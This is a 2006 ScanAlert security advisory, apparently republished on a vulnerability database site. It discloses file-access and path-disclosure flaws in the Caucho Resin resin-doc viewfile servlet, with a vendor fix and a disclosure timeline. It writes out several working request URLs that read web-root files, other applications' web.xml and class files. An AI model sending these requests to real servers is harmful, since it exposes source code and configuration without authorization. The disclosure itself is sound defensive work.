ScanAlert Security Advisory

Advisory Content :

ScanAlert Security Advisory
http://www.scanalert.com

Caucho Resin Multiple Vulnerabilities - Arbitrary File Access & Information
Disclosure

Date: 5/16/06
Vendor: Caucho
Package: Resin
Version: 3.0.17 and 3.0.18 ? Vendor Confirmed
Credit: ScanAlert?s Security and Enterprise Services Teams.

Risk:
Common Vulnerability Scoring System (CVSS) -
http://www.first.org/cvss/intro/

Related Exploit Range: Remote
Attack Complexity: Low
Level Of Authentication Needed: Not Required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None

Overview

Caucho Resin is a high performance, Sun certified J2EE server featuring
load
balancing for increased reliability. Resin is well known for its
flexibility
and ease of use, saving both engineering time and staff costs.

Vulnerabilities

Resin contains documentation that is available in the /webapps directory
and
is an expanded war file available at /resin-doc by default when using the
standard resin.conf and Resin directory structure for configuring the
application.

This documentation contains a servlet for viewing files within the
integrated tutorial:

http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2
Ftut
orial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-star
t=&r
e-end=#code-highlight

The viewfile servlet can easily read any file within the web root with no
parameters:

http://targetsystem/resin-doc/viewfile/?file=index.jsp

It is possible to set the context path outside of the resin-doc and read
any
file on alternate web roots:

http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servlet
path
=&file=WEB-INF/web.xml

When resin-doc is installed on a system it is possible to read all files
contained within the web root including class files which can then be
decompiled to view the Java source:

http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=
WEB-
INF/classes/com/webapp/app/target.class

An incorrect path in the request will reveal the absolute installation
path:

File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-e
xist
ant.class

Solution:

Remove the resin-doc.war file from all production systems and do not deploy
using default configuration files. Upgrade to version 3.0.19 or better.

Resolution Timeline:

Vendor Notification: May 5, 2006
Vendor Response: May 9, 2006
Vendor Fix: May 15, 2006
Coordinated public release of advisory: May 16, 2006
------------------------------------------------------------------------
----
--------------------------

ScanAlert's mission is to make the web safe from hackers.

We make web sites secure from hackers and certify it to their customers via
our patent pending HACKER SAFE® security certification technology. Our
daily
security audits and real-time certification enables consumers to know
whether the sites where they shop are taking the necessary steps to
safeguard their personal information from hackers. By alleviating
consumers'
fears of identity theft and credit card fraud, online merchants who earn
HACKER SAFE certification consistently see substantial increases in online
transactions

For additional information regarding ScanAlert and the Hacker Safe program
please contact:

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert ( www.scanalert.com)
860 Napa Valley Corporate Way
Suite R
Napa, CA 94558
Phone: 877 302-9965
Int'l: 707 224-7656
Fax: 707 252-9626
Email: joep (at) scanalert (dot) com [email concealed]

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason